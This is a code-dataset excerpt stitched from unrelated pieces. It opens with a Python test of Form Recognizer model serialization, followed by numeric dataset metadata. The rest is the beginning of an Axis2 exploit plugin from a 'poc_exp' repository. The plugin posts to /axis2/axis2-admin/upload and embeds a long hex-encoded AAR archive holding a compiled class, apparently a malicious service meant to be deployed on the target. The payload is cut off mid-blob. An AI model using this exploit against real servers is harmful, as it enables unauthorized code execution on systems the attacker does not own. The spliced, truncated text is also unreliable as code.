    """CustomFormSubmodel.to_dict() serializes its fields mapping of
    CustomFormModelField objects into nested plain dicts."""
    example_field = _models.CustomFormModelField(
        label="field_label",
        name="field",
        accuracy=0.98,
    )
    submodel = _models.CustomFormSubmodel(
        model_id="1234",
        form_type="submodel",
        accuracy=0.98,
        fields={"example": example_field},
    )
    expected = {
        "model_id": "1234",
        "form_type": "submodel",
        "accuracy": 0.98,
        "fields": {
            "example": {
                "label": "field_label",
                "name": "field",
                "accuracy": 0.98,
            }
        },
    }
    assert submodel.to_dict() == expected
def test_custom_form_model_to_dict(self):
    """CustomFormModel.to_dict() serializes top-level metadata plus nested
    submodels (with their fields), errors, training documents, and
    properties into plain dicts."""
    model = _models.CustomFormModel(
        model_id="1234",
        status="ready",
        training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
        training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380),
        submodels=[
            _models.CustomFormSubmodel(
                model_id="1234",
                form_type="submodel",
                accuracy=0.98,
                fields={
                    "example": _models.CustomFormModelField(
                        label="field_label",
                        name="field",
                        accuracy=0.98,
                    )
                }
            )
        ],
        errors=[
            _models.FormRecognizerError(
                code=404,
                message="error not found",
            )
        ],
        training_documents=[
            _models.TrainingDocumentInfo(
                name="sample doc",
                status="succeeded",
                page_count=3,
                errors=[
                    _models.FormRecognizerError(
                        code=404,
                        message="error not found",
                    )
                ],
                model_id="1234",
            )
        ],
        model_name="sample model",
        properties=_models.CustomFormModelProperties(
            is_composed_model=True,
        )
    )
    d = model.to_dict()
    # Expected plain-dict form; datetimes are passed through unchanged.
    final = {
        "model_id": "1234",
        "status": "ready",
        "training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
        "training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380),
        "submodels": [{
            "model_id": "1234",
            "form_type": "submodel",
            "accuracy": 0.98,
            "fields": {
                "example":
                {
                    "label": "field_label",
                    "name": "field",
                    "accuracy": 0.98,
                }
            }
        }],
        "errors": [
            {
                "code": 404,
                "message": "error not found",
            }
        ],
        "training_documents": [
            {
                "name": "sample doc",
                "status": "succeeded",
                "page_count": 3,
                "errors": [
                    {
                        "code": 404,
                        "message": "error not found",
                    }
                ],
                "model_id": "1234",
            }
        ],
        "model_name": "sample model",
        "properties": {
            "is_composed_model": True,
        }
    }
    assert d == final
| 35.638158
| 84
| 0.333078
| 3,094
| 37,919
| 3.894312
| 0.058177
| 0.100423
| 0.080671
| 0.071707
| 0.922732
| 0.900988
| 0.882812
| 0.872272
| 0.840734
| 0.832849
| 0
| 0.158361
| 0.538543
| 37,919
| 1,063
| 85
| 35.671684
| 0.530232
| 0.008254
| 0
| 0.796098
| 0
| 0
| 0.09612
| 0.001117
| 0
| 0
| 0
| 0
| 0.019512
| 1
| 0.019512
| false
| 0
| 0.002927
| 0
| 0.023415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa5d6df801750fde4d908852fd9ed5759ff66651
| 17,559
|
py
|
Python
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
middlewareScan/plugins/axis_deploy.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#coding:utf-8
#author:wolf@future-sec
import urllib2
def run(host,port,timeout,cookies):
url = "http://%s:%d"%(host,int(port))
upload_url = url + '/axis2/axis2-admin/upload'
boundary = '-----------------------------3233243418974'
data = []
aar_file = "\x50\x4B\x03\x04\x0A\x00\x00\x08\x00\x00\xFB\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x03\x04\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x45\x93\x1C\x16\x5A\x00\x00\x00\x67\x00\x00\x00\x14\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\xF3\x4D\xCC\xCB\x4C\x4B\x2D\x2E\xD1\x0D\x4B\x2D\x2A\xCE\xCC\xCF\xB3\x52\x30\xD4\x33\xE0\xE5\x72\xCC\x43\x12\x71\x2C\x48\x4C\xCE\x48\x55\x00\x8A\x01\x25\x2D\xF5\x8C\x78\xB9\x9C\x8B\x52\x13\x4B\x52\x53\x74\x9D\x2A\x41\xEA\xCD\xF5\x0C\xE2\xCD\x0D\x75\x93\x0C\x4D\x14\x34\xFC\x8B\x12\x93\x73\x52\x15\x9C\xF3\x8B\x0A\xF2\x8B\x12\x4B\x80\xFA\x35\x79\xB9\x78\xB9\x00\x50\x4B\x03\x04\x0A\x00\x00\x08\x00\x00\xFA\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x6C\x69\x62\x2F\x50\x4B\x03\x04\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x59\x1F\x55\xA8\xA1\x0C\x00\x00\xD7\x19\x00\x00\x09\x00\x00\x00\x43\x61\x74\x2E\x63\x6C\x61\x73\x73\x9D\x58\x09\x78\x5C\x55\x15\xFE\x4F\x32\xC9\x9B\x4C\x5F\x9B\x26\x69\xD2\x2C\x4D\xDB\x74\xCD\x1E\x0A\xA5\x4B\x52\x4A\x9B\x34\x6D\x43\xB3\x74\x49\x5B\xD2\xB2\x4D\x26\x2F\xC9\xB4\x33\xF3\xD2\x99\x37\x4D\x2B\xE0\x46\x15\xF7\x0D\x10\x51\x41\x50\x31\x2A\x05\x43\xD1\x49\x64\x58\x54\x50\x90\xAA\x2C\xA2\xA2\xE2\x2E\x2A\xAE\x20\xEE\x0B\xF8\xDF\x37\x4B\x66\x92\x29\xE5\xB3\xDF\x97\xBC\x9B\xBB\x9C\x7B\xCE\x7F\xFE\xB3\xDC\x3E\xF6\xF2\xBD\x0F\x20\x1B\x0D\x72\x54\x43\x96\x20\xBB\xCD\x6D\x69\x70\x08\xE6\x1E\x72\x1F\x75\x37\xF9\xDC\x81\xA1\xA6\x9E\xFE\x43\x86\xC7\x12\x38\x8D\x80\xC7\x1C\xF0\x06\x86\x04\x85\x9D\x53\xCB\x7B\xAC\x20\xE7\x5A\x04\x9A\xC7\xE7\x0E\x85\x96\x9D\x23\x28\x48\x59\x6E\x53\x93\x5C\xCD\xDB\x73\x3C\x60\x0D\x1B\x96\xD7\x43\x49\x1B\x3C\x3E\x6F\xC0\x6B\x6D\xE4\x85\xD5\x35\xFB\x04\x8E\x36\x73\xC0\x70\x62\x8E\x20\x67\x6F\xEF\xD6\x86\x75\x79\xA0\x06\x3A\x72\x90\xEB\xE2\xA8\x50\x47\x11\xE6\x51\xEC\x90\x61\xED\x39\x1E\xB2\x0C\x7F\x7B\x52\x93\x79\xD5\x35\x33
\x75\x51\x87\x4A\x74\xCC\x47\xA9\xC0\xE5\x0D\x75\x9B\x56\xBB\x7F\xC4\x3A\x2E\x28\xAE\xEE\x9C\x6E\x57\x4B\xCD\x01\x41\x7E\xA7\x37\x60\x74\x87\xFD\xFD\x46\xB0\xD7\xDD\xEF\x33\x94\x85\xA6\xC7\xED\xDB\xE7\x0E\x7A\xD5\xDF\xF1\xC9\xDC\x0D\xB6\xD6\x2E\x02\x56\xA9\xA3\x02\xB3\xA8\xB9\x35\xEC\x0D\x51\xED\x4E\x02\x47\x2B\x67\x53\xC5\x9D\x41\x73\xC4\x08\x5A\x5E\x83\xF3\xA5\x09\xF5\xC2\x96\xD7\xD7\x34\xB5\xC2\xAD\xAE\xF6\x63\x1E\x63\xC4\xF2\x9A\x81\x90\x86\x65\x82\x22\x7B\x9F\xD7\x6C\xEA\xE8\x49\xAE\x68\x58\x41\x13\x33\x09\x70\x61\x39\x2A\x15\x4C\x35\x3A\x34\x38\x9D\xC8\x72\xA1\x1E\x8D\x1A\x3D\x89\xFC\x69\xE8\xEB\x68\x02\xBD\xA2\x0D\x9A\xC1\x6E\xB7\x9F\x76\x2C\xAF\x9E\x89\x59\xCD\x0C\x9F\x69\x38\x57\xB0\x70\x6A\xB6\xDB\xB4\xE7\xB7\x18\x83\x5B\xCD\x70\x60\xA0\x3D\x18\x34\x83\x2E\xAC\xC6\x1A\x0D\xE7\x27\xD4\xB7\x37\xF6\x0E\x07\xCD\x51\x85\x98\x8E\xB5\xCA\x6F\x2E\x82\xD2\x65\x84\x42\xEE\x21\xC3\x85\x55\x58\xAF\xA0\x6B\x9E\xE6\x8C\x84\x16\xFB\x14\xB8\x1B\x74\x5C\x00\x92\xC3\xC9\x83\xF6\x9D\x14\x5F\x3D\x53\x41\x27\x36\xD1\x51\x4D\x1E\x33\x30\xE8\x1D\x6A\x1C\x49\xC1\xA6\x1E\xAD\x3A\xDA\xB0\x85\xE7\x28\x62\xB7\x11\x32\xC3\x41\x8F\xB1\x39\xC4\x5B\x0C\xB7\x9F\xA0\x9D\x19\x00\xE5\x80\xC0\x48\xD8\x8A\x6D\x6D\x51\x38\x6F\xD5\xB1\x0D\xDB\xE9\x6B\x9F\xE9\x1E\x50\x3E\xCD\xB8\xB3\x66\x9F\x86\x8B\x04\x8B\xA7\x69\x49\xF2\xC5\xE0\x4A\xF8\x54\x20\x23\xA4\xE7\x99\x68\x51\x60\x24\x36\xF6\x9A\x31\xCD\xA6\xA9\x9B\x14\xD4\x92\x81\xF9\x1A\x76\x26\x08\x43\xF5\x62\x93\xFB\x83\x5E\xCB\xA0\xA7\x7A\x50\xA9\x61\x4F\x0A\xD1\x76\x72\xD5\x4A\xAC\xEE\xC6\x5E\xE5\x97\x7D\x2A\xA4\x92\xF6\xC5\x16\x5B\x0E\x28\xB7\xAC\xC6\xC5\x3A\xFA\xA0\xA2\x65\x44\x1D\xDC\x63\xB9\x3D\x87\x7B\x83\x6E\x8F\x91\x06\x49\x8A\x50\xDB\x9B\x3D\xB8\x44\xC7\xA5\x8A\x06\x4E\x2B\x69\x90\xF0\x4C\x71\x46\x9B\x04\x59\xA1\xD1\x24\x3C\xD3\x6C\xA0\xC7\x99\x3D\xE6\x86\xC2\x81\xC6\x43\x81\x70\x63\x22\x1F\xB9\x60\x60\x48\xC3\x60\x5A\xD6\x8A\x25\x0A\x1D\xC3\xF0\x0A\x66\x4D\x85\x25\xB3\xC0\x8A\xB3\xD0\x3F\x3E\xE5\xC4\x61\x01\x5C\xF0\xC3\xD4\x10\x48\x17\x6E
\xEF\xD0\x31\x82\x23\x8C\xAB\xA3\x6E\x5F\xD8\xE8\x19\x9C\x26\x38\x91\x5E\x32\xA5\x27\x3F\x18\x94\x96\x02\xC5\xC1\x29\xBF\x9A\x38\xAA\x63\x54\xE5\xAB\x5C\xE3\x48\xD8\xED\x23\xE3\xB3\xCD\xFE\x43\xE9\x99\x36\x2E\x91\x70\x7B\x03\x09\xDA\xF5\x9A\x3D\x61\x2B\x49\x42\xC1\x9A\x33\x90\x33\x39\xDB\x7A\xDC\x32\x36\x07\x83\xEE\xE3\xA9\xE7\xC8\x9B\xAB\x05\x95\xAF\xBA\xC7\x85\xAB\x50\xA9\x7E\xBD\x51\xC7\x9B\xF0\x66\xE6\xBC\x51\xE5\x14\xDA\x5F\x7D\xB0\xB5\xA3\x43\xF9\xFA\x04\xDE\xAA\xE1\x2D\xA9\xA9\x6C\x4A\x05\x1D\xD7\xE2\x6D\xB4\x97\x63\xC6\x50\x0E\xCF\xD4\x74\xD0\xD9\xDE\x40\x92\x09\xD3\x54\xE6\xDE\x7E\xB7\x49\x20\x16\x9D\x45\x77\xD2\xA9\x9F\x92\x0E\xB6\x72\xE0\xE6\x0F\xC5\x16\x7B\xCC\x91\xE3\x29\xC2\x7A\xCD\xAD\x5E\x95\xC0\x6B\x33\xA3\x93\x29\x0F\x69\xB8\x9E\x40\x27\x76\xAB\xE3\xE9\x60\x5C\x87\xF5\xAA\xCC\xDC\xA8\xE3\x75\xB8\x52\xC1\x72\x93\x8E\x0F\xE3\x23\xE4\x9A\x65\x26\xF5\xA4\x0D\xD5\x35\x07\x5B\xD5\xEE\x9B\x15\x6A\xB7\xC4\x2D\x27\x56\xB7\xE2\xE3\x1A\x6E\x4B\x09\xD6\x54\xF1\x3A\x3E\xA1\x8A\x4B\xCE\xA0\x2F\x1C\x1A\x56\xA7\x6F\xD7\xF1\x29\x7B\xC6\xE3\x33\x43\x34\xC4\x31\xE2\xB6\x86\xC9\x91\x41\x05\x50\x79\xE7\x99\xD4\x24\x36\xD9\x1E\x55\xD1\x4F\x0A\xE6\xA7\x6E\x4A\xB1\xDE\x85\x3B\x94\x29\x7E\x7C\x4E\xC5\x3F\x35\x74\x18\xC7\x0C\x8F\x0B\xA7\xF0\x79\x0D\xF7\x30\x21\x4D\x81\xB3\x3B\x1C\xB0\xBC\x7E\xA6\xF5\x2F\x20\x12\x4B\xEB\xF1\x19\x95\xCC\x53\x89\x1E\x9F\x6E\x51\x52\x26\x75\x8C\xE3\x8B\x82\x95\x67\x89\x3A\xC6\xA7\x87\x45\x82\x67\xA2\xB8\x5F\xC3\x7D\x69\x37\xC7\x17\x75\x3C\x80\x07\x05\x73\x78\x73\x8A\x05\xB4\xAD\xFA\x4C\xD9\xDB\x8F\x2F\x2B\xB3\xBE\xA2\xF6\x1C\x6C\xCD\x5C\x70\x04\x0F\xEB\xE8\x42\xB7\x02\xCB\x3F\x90\xC6\xC7\x9E\xD4\xCC\xE4\x1C\x30\x47\x03\xB1\x1A\x90\xC9\x98\xCC\x2C\x7A\x2C\x51\x43\x03\x86\xD5\xD4\xE5\xF6\xB1\x08\xFB\x8D\x81\xBD\xBB\x3B\x53\x8A\xFC\x37\x04\x7A\x72\x0F\x97\x5C\x38\xAD\x5C\x72\x1A\x8F\xEB\x78\x02\x4F\xD2\x60\xA6\xAE\x40\x9B\x19\x08\x30\xFE\xED\x12\x52\x9E\x30\x38\x7E\x62\x6A\x8D\x36\x7F\x5B\xE1\xF7\x34\x93\x68\xE6\x1D\xCA\xE0\xEF\xEA\x78\x3F\x3E\x40
\x83\xC3\x41\x1F\x59\x15\x1A\x36\x7C\xFC\x96\x64\xB0\xAA\x43\x19\xF1\xC3\x44\x72\xB0\x85\x05\x0E\x07\x08\xC4\x76\x33\x64\xA5\xD8\xF0\xA3\x44\xDF\xA1\xB6\xEC\x31\x3D\x87\x0D\xCB\x85\x67\xF1\x13\x85\xFE\xF7\xD5\xE8\x67\x3A\x7E\x8E\x5F\x70\x17\x9D\x97\x9E\xB3\x4A\x53\xBC\x97\xC6\x5E\x75\x8C\xA6\xFC\x2A\x61\x4A\x8A\x5E\xAD\xE1\xC1\x41\x23\xE8\xC4\x6F\x98\x31\xF7\x86\x8C\x60\x73\x9E\x0B\xCF\x61\xBD\x13\xBF\xE3\xC4\xE8\xB0\xE9\xF6\x7B\x95\x9D\x7F\x50\xE4\xF3\xAA\xA5\x3F\xE9\x78\x01\x2F\x72\xD1\x3D\x42\x2C\xE9\xC2\xFA\xD7\x54\x05\x62\xF7\xB4\x28\x09\x97\x28\x36\xFD\x45\xC7\x5F\x55\x94\xAB\xD6\x44\x85\x79\x48\x45\xF2\xCD\x6A\xE5\x1F\xCA\xD2\x7F\x0A\xCA\xEC\x74\x98\x99\x69\x7E\xFC\x5B\x9D\xFF\x4F\x66\xA8\x6B\x54\x0A\x73\x0C\x13\x57\x15\xE0\x66\x90\x1F\x09\x25\xBB\xE9\x29\x5C\x55\x54\x9B\x61\x2B\xB5\x4A\x4E\x0B\x7A\x3D\xD1\x38\xED\x64\x9A\x50\x38\x30\x71\xD7\x4B\xAE\x2E\x9A\x38\x63\xE1\x63\xAF\x76\x92\xCB\x46\x50\xA9\x3C\xA3\xB9\x8A\x2D\xB5\x38\xC5\x45\x25\x9A\x5C\xA2\xCB\x1C\x4D\x66\x33\x36\x32\xEE\xD3\x25\x5F\xE6\xC6\xCA\x6C\xA2\xD9\x12\x2C\x39\x33\xC0\x71\x4E\x12\xD6\xD3\x52\xA8\x8B\xDD\xDD\x6B\xAA\x46\xDB\x59\xAD\xC0\x2E\x2C\xB1\x13\x89\xCC\xDD\xFC\x9A\x02\x6E\xE6\x0C\x5B\x17\x4D\xE6\x27\x08\xA4\x6A\x88\xED\x50\x63\x20\xD6\x51\x68\x52\xC6\x60\xCA\x84\x62\xA2\x2F\xBA\x4E\x2A\xE8\x58\x59\x90\xD9\x65\xAA\x33\x92\x52\x59\xA8\xB6\x2C\x12\xD4\x55\x67\xF6\x48\x46\x36\x48\x89\x54\xA9\x73\x4B\x54\x77\x3B\xBD\xE5\x52\xEB\xCB\x64\x85\x26\xCB\xE9\xAF\xF4\x35\x55\x48\x9A\x79\x1A\xB7\x93\x26\x03\x6E\x8B\x35\xCF\x31\x68\x83\x24\x6C\xCE\xB2\xFA\xD9\x3E\x95\x76\x66\x36\x57\x15\x55\x77\xD8\x32\x05\x17\xFD\x9F\x78\x66\xEA\x93\xE4\x9C\xB8\x8E\x8D\x5E\xB3\xD1\xF2\x8F\x0C\x78\x89\xEB\xB9\x89\x9C\x16\xAF\x38\x2E\x59\x25\xAB\x55\x88\x3C\xCA\x91\x8A\x25\x91\xB5\x3A\x1E\xC1\xA3\x4E\x59\xCF\xD7\xE1\xB2\x2B\x63\x07\xAF\x76\x49\x8B\x5C\xA0\xC9\x86\x44\xC1\xB2\x3B\xE4\xA0\x31\x64\x1C\x6B\x22\x3B\x68\x43\x40\x97\x8D\xAA\xA7\xCB\x39\x12\x36\x2D\x23\x8F\x62\x37\xE9\xB2\x19\xB9\x14\x12\x32\x46\xDC\x41\xB7
\xA5\x9E\x25\x7E\x69\xD3\x65\x8B\xB4\xB3\x4C\x05\x8D\x11\x1F\xBB\xD4\xCD\x2A\xC3\xAD\x7B\x6D\x79\x3B\x43\xCF\xC6\x7B\xB6\xE9\xB2\x5D\x75\x17\xB9\x03\x86\xCF\x50\x9D\x0F\x1F\xAF\x44\xDC\xA9\xC0\x8F\x3D\xAC\x72\x69\xC4\x16\x2F\x23\x4A\xE3\x20\x46\xDC\x39\x69\xC5\x59\x3D\x84\xED\xD7\x90\x35\x6C\x32\x07\x35\x9E\x25\x07\x05\x8D\x41\x1F\x93\x76\x53\x6C\x7F\x8B\x0A\xE2\x5D\xBA\xEC\x16\x76\xF1\x85\x14\xB3\xC5\xE0\x93\x9B\xCE\x8D\x2D\x33\x55\x54\xB2\xDB\x78\x95\xE3\xB2\x57\xF6\x6B\xB2\x2F\xD1\xD7\x64\xD8\xA3\xCB\xC5\x89\x58\x8C\x5B\xE4\x8F\xAB\xAA\xF9\x13\x97\x54\xBC\xCA\x15\xE4\x20\x5D\x23\xFE\x64\x53\x92\x79\x93\xC3\xEF\x56\x8D\x5F\x49\xF5\xC1\xCC\x79\x52\xA4\x5F\xC7\x62\x54\x39\xF1\x5F\xF5\x00\x1B\x72\xE2\x65\x97\x0C\x89\x57\x93\xE1\xB4\xB6\xA0\x23\x60\x91\x19\x4C\x3F\x87\x84\xBD\xBA\x93\xDE\x0F\xB1\xB5\xB1\xCE\xF0\xB6\xEC\x50\x82\xD9\x5B\x3D\xA3\x0A\xD2\x6A\x31\xD5\x73\x66\x96\x26\x47\xD2\x1E\xAF\x29\xEF\x34\x87\x3B\x38\xA4\x9E\x9E\x19\x94\x24\xAD\xF6\xD8\x69\x2E\xE6\x64\x27\x5F\xFF\x8D\x6A\x13\xAA\x98\x6C\xB3\x01\x64\xC1\xA9\xFE\xFB\x82\x23\xA7\x7A\x9F\x73\x36\x0F\xEA\x5F\x01\xC7\x2E\xCC\xE2\xDF\x3A\xFF\x6A\xE3\x57\xFD\xAB\x28\x9C\x7D\x0F\xF2\x27\x51\x30\x89\xE2\x9B\x90\xC7\xC1\x18\x72\x4F\x21\x9F\x93\x77\xDB\xC2\xCA\xF8\x7B\x8E\x2D\xB8\x84\x62\xCB\x50\x8E\x79\xFC\x51\x2B\xA0\x88\x8A\xA4\xC0\x26\x7E\x95\xC8\x9C\xDA\x09\x2C\x98\x3A\x9A\x6B\x4F\xC6\x8E\xE8\xB1\x0D\x58\x88\x45\xFC\xE6\x29\x98\xB9\x6B\x09\xC7\x0E\xAE\x2C\xB5\xC5\x8C\xF0\x2A\xB5\x6B\x4D\x14\xCB\xFB\x26\xB0\x72\x47\xED\x29\x54\xF7\x3D\x82\x05\xFB\x0B\x6B\x27\x51\xD7\x77\x0F\xAA\xC7\x90\x1F\xC5\xAA\x03\x97\x47\x70\xDE\x04\xD6\x3D\x18\x41\x4B\xE1\x85\x11\x6C\x8E\xA0\xBD\x76\x9C\x67\x0B\xA8\x68\x25\x3A\xD2\x54\x5F\x42\xDB\x97\xF2\x1D\xB9\x2C\xA9\x87\x13\x8D\xD8\x81\x4E\x5B\x0F\x36\x60\x71\x23\xF6\x51\x3B\x65\x58\x79\x14\x3D\xBC\x7D\x57\x67\x6D\x14\xBB\xFB\xEA\x1C\x13\xE8\x8D\x60\x7F\x5D\x04\x07\xC7\xA7\x81\xD2\x60\x4B\x2A\xA6\xF9\xE5\x36\x44\xF6\x69\x5C\x86\xCB\x6D\xFC\x0B\x71\x05\xDC\xB6\x07\x58\x68\xE2\x77\xAC
\x88\x23\x9F\x5B\xD8\x3F\x89\x81\xF1\x69\x48\xAD\x4D\x82\x9B\xA7\xFE\x17\x29\x7E\xA6\x8B\x33\x6A\xB5\xA2\xF6\x11\xE4\x64\x9F\x2C\x3C\x44\x2C\x7C\x11\x04\x23\x08\xDF\x04\x2D\x7B\x0C\x0E\xC7\xC9\x69\x8A\x6D\x26\xA8\xAD\x14\xBA\x25\x05\xFA\x0A\x1C\xC3\x71\x5B\x34\x5F\x0E\x33\xA0\xBF\x96\x63\x07\xBF\x2B\xA3\xB8\x8A\xC6\xBF\xBE\xB3\xC0\x81\xFB\x9C\x5D\xD9\x1B\xC7\xE0\xAA\xAB\xCF\xAE\x8C\xE0\x0D\xB5\xF5\x11\x5C\xD3\xB7\x31\xEB\xD6\x57\x5E\xAC\x9B\xD2\x7C\x21\x79\x06\x62\xE8\xE4\x93\x7B\x0E\x76\x62\x2E\x76\xD1\xDE\xDD\xBC\x78\x17\x43\xA8\xD7\x56\xA0\x36\x26\x1A\x6F\xC7\x3B\x6C\x64\x16\xE1\x9D\x78\x17\xAF\x9E\x43\x09\xEF\xC6\x7B\x28\x69\x2E\xED\x7D\x2F\xDE\x47\xE5\xF3\x54\x87\x38\x43\xBD\xC3\x5C\x51\x86\x55\x46\x71\x5D\x5F\xDD\x04\x6E\xE8\xAA\x27\x0A\x1F\x8C\xE0\x43\x11\x7C\x94\x7A\x7D\x8C\x3F\x9F\x9C\x22\x9E\x62\x2B\xE8\x88\x3C\xBA\x62\x1E\xDD\x50\x4A\x47\x2C\x40\xBF\xAD\xCC\xE2\x98\xA0\xB8\x32\x6A\x34\x66\xC3\x9F\xC7\x9D\x9F\xC6\x67\x28\x21\x0F\x9F\x85\x77\x86\x0A\x9B\x28\x53\xE1\x58\x12\x85\xBF\x2F\x8A\x3B\xFA\xC8\xF5\x3B\x63\x3A\x4C\xE0\xAE\xE9\xAE\x3C\x9C\x82\x7C\x89\x7D\x83\x42\x9E\x4D\x61\xDC\xA9\x06\x25\x2B\x47\x57\x29\x69\x93\xB8\xBB\x36\x82\x89\x08\xEE\x8D\xC9\x63\x08\x4E\xE0\x4B\xE3\x9D\x75\x93\x78\x68\xDC\x16\x51\x4E\xF7\x2D\x4D\x73\x71\x98\x33\x47\x69\xD4\x68\x0A\xF7\xAA\xF0\x55\xFB\xA2\x05\x54\xF5\x32\x7C\xCD\x36\x8A\xA5\x2E\x6E\x4A\x2E\xBF\x5F\x8F\x1B\xB3\x83\x32\xD4\x89\xA2\x28\x4E\x2B\x43\xBE\x19\xC1\xB7\x22\x78\x8A\x17\x7E\x67\x0A\x45\x97\xBD\xE5\x1A\x12\xF9\x44\xCA\x25\x45\xF8\x9E\x7D\x89\x1A\x25\x90\x63\x6A\x4B\xB9\xE4\x07\xF1\x4B\x5E\x22\x35\x14\x39\xBC\x51\x3C\xDB\x57\x5B\x31\x81\x1F\x77\xD1\x4D\x3F\xED\xE6\xAF\x5F\x36\x3B\x1A\xA2\x78\xAE\xAF\xF0\xD7\x13\x78\xBE\xF0\xB7\x93\xF8\x7D\x04\x7F\x8C\xE0\xCF\x11\xBC\x14\xC1\xDF\xB2\xD7\xE4\x14\xCC\x25\xFD\x9A\x73\xC7\xB0\xB8\x41\x21\x54\x96\x9B\x5D\x9C\x53\x38\x7B\x02\x7F\x27\xF1\xB9\xBB\x70\x76\x04\xFF\xE2\xCE\x32\x47\x59\xAE\x62\xE5\x9A\x1C\xD2\xF2\x99\x29\xD5\x6B\xA9\x3C\xC8\x2C\x17\x59\x95\x4F\x5E\x15\x93
\x55\xE7\x90\x57\xE7\xF1\x51\xDB\x8C\xEB\x71\x01\x6E\xC0\x01\x7E\x87\x71\xA3\x6D\xDA\xF6\x98\xA2\xF8\x6F\xDC\x34\x2F\x5E\xE6\x29\xA6\x5B\x12\xE8\x15\x51\x52\xF3\x71\x40\x44\xB2\x88\x5B\x31\x59\xAD\xC8\xE3\xA0\xB4\x35\x36\x6B\x73\x28\xB3\xC9\x66\x72\x2E\xF2\x24\x3B\x19\xED\x6B\x6D\xC0\x80\xF9\x51\x48\xDF\x84\x38\x98\xAD\x22\x92\x53\x24\x79\x11\x99\x15\x91\x82\xE9\x9C\xB9\x65\x2A\xFC\x65\x9E\x14\x67\x40\xF4\x84\x9D\xDE\x99\x46\xA2\x52\xD2\x17\x95\xD2\x3E\x3B\x1C\x2A\x27\xA4\xBC\x7E\x42\xF8\x59\xDC\xEC\x28\x73\xD4\x46\x64\x69\x99\x23\x22\x2B\xA7\xE0\x28\xB4\x03\xF0\x0E\xCA\x3F\x49\xFE\xDF\xC9\xC0\xBC\xCB\xBE\x6B\x75\x4C\x9A\x54\xC7\xCD\x5E\x21\x35\x71\x5D\x56\xD8\x65\x24\xCB\x1E\xBD\x20\xB5\x34\xBB\x1C\xBA\xD4\x49\x3D\x25\xE5\x49\x83\x34\x66\x20\xD5\x44\xBC\xF4\x6C\x2B\x92\x26\x66\xB7\xEE\xA8\xAC\xEA\x6B\xA8\x9B\x90\xF3\x9A\x1D\xB5\x4A\xA1\xF3\x27\x65\x4D\x7D\x91\xAC\x9B\x94\x66\xE5\xFB\x06\xA6\x31\x7A\xFF\x94\x5C\x18\xF7\xBD\xB4\xD2\xB3\xCD\x39\x6A\xEB\xD6\xFD\x65\x39\x53\xF0\x94\xDB\x62\xEF\xA5\x8F\xA2\x34\xE5\x3E\x32\xFF\x7E\x6C\xE4\x9B\x7C\x0B\x1E\xB4\xCD\xD8\x18\xBB\x36\x49\xCC\x6D\x72\x51\xDC\x8C\x6D\x76\x44\x64\xF1\xE4\x26\xD9\xC1\x51\x36\xCF\x9F\x2F\x9D\xD2\x45\x33\x36\xD2\x10\x76\x1A\x54\x3A\x4F\xBA\xA5\x27\xEE\xB3\x3B\xB9\x47\x81\xD5\x7E\xD6\xD2\x23\x3B\x3B\xB3\x2F\x18\xC3\xFC\xBA\x05\xE7\x76\xD7\x36\x44\xA4\xD7\x4E\xC8\x39\x0D\xE3\x27\xB2\x64\x41\xDD\x03\xB7\xBD\xF2\xBC\x8C\xDB\xC5\x66\x36\x09\xD1\x91\x96\x2E\x1F\x62\x31\x7A\x18\x35\x54\xAE\x81\x61\xBA\x8E\x41\xDA\xCC\xBF\xDB\xF0\x58\x4A\xBA\x6C\x97\x3E\xDB\x9C\x65\xA8\x62\x83\x7D\x90\x92\x56\xA0\x52\x2E\x21\xDD\xB2\x78\x6A\xB6\x5C\x2A\x97\xA9\x74\x29\x97\xCB\x15\x71\xD5\x47\xE3\x41\x5D\x35\x29\xEE\xCE\xBA\x22\xF1\x44\x64\x80\x1F\x83\x9F\x49\x19\x9C\x14\xDF\x18\x9C\x9D\x75\x11\x09\xDC\x6D\x63\x53\xCA\x47\xC0\x48\x5A\xC2\x7C\x9C\x17\x3F\x41\x74\x9F\x64\x06\x79\x8A\x44\x79\x3A\x25\x61\x56\x49\x50\x42\x76\x42\x9C\x6F\xD7\x4E\xE1\x1E\x87\x5D\xEB\x58\xFA\xC5\x52\xBE\x92\xF0\xFF\x00\x50\x4B\x03\x04\x0A\x00\x00\x08
